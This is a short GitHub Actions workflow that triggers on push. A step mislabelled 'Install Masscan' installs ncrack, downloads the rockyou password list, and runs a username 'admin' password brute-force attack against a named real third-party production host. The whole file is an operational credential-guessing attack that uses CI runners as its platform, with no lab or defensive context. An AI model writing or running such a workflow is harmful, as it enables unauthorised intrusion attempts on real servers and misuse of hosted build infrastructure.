name: masscan_ip_scan

on: [push]

jobs:
  install-tools:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v2
      with:
        terminal: false

    - name: Install Masscan
      run: |
        sudo apt-get install -y ncrack
        ls
        echo "--------------"
        wget https://github.com/josuamarcelc/common-password-list/raw/main/rockyou.txt/rockyou_1.txt
        echo admin > user.txt
        ncrack -U user.txt -P rockyou_1.txt https://direct-tms.linecorp.com/server-status/
        

        
